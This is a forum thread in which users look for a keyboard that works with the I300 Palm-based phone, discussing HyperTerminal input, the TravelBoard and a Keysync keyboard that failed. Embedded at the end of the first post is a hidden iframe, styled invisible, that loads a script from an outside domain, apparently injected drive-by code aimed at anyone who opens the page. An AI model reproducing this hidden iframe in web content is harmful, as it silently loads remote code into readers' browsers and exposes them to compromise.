    Keyboard for I300

I just purchased the Palm keyboard for
my I300 and was trouble by its
    incompatibility. Hope thats a word!
Anyway, the tech at COMP USA did not
know of a compatible keyboard as of
yet and through out 6 months before
we could expect any further accesories
from our friends at Sprint and Samsung.
    You all have any idea?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Sure, there are a couple of solutions. If you're just interested in input but not portability, there are articles on how to use HyperTerminal on your dektop to use your desktop keyboard to send input to your Palm. Here's one:

There's also the TravelBoard, which is a serial keyboard so most PDAs can use it. Just plug your cradle or serial cable right into it. It's at:

    Hope this helps!

Thanks Dan. The travel board may do,
though I was attracted to the convenience
of the folding keyboard. I hope this void
is filled in the near future.

That travelboard most likely will not work with the I300. I purchased the Keysync keyboard by Ibiz (looks exactly the same as the travelboard and connects the same way, sold at CompUSA) and it did not work with the I300 (works with the Kyocera 6035 though).

I want some kind of adaptor (serial or Infrared) that plugs into a PS-2 keyboard and goes to the Palm (it could even require a battery). At $5-10 a keyboard I'd keep a keyboard in my car, my mom's, my girlfriends and if I ever needed to type a quantity of text I'd be all set.

What kind of problems did you have with the Keysync?

Didn't work at all. Driver installed just fine but couldn't get and kind of text to appear in any app and I tried everything!
